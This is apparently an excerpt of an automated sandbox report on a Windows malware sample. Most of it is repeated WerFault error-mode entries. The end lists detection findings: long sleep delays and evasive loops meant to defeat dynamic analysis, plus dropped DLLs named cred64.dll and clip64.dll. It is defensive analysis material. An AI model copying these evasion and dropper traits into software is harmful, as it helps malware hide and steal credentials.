Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Thread delayed: delay time: 180000
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe API coverage: 3.1 %
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe API coverage: 1.6 %
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe API coverage: 7.4 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe TID: 7956 Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe TID: 7956 Thread sleep time: -1170000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe TID: 8036 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe TID: 8028 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe TID: 7956 Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_00408180 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 0_2_00408180
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Dctooux.exe_797badcf6563115bb57cdaf452d66c733e0e4_312956d7_e0bdaaf8-20b7-4ad5-a3f8-3137a7face24\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
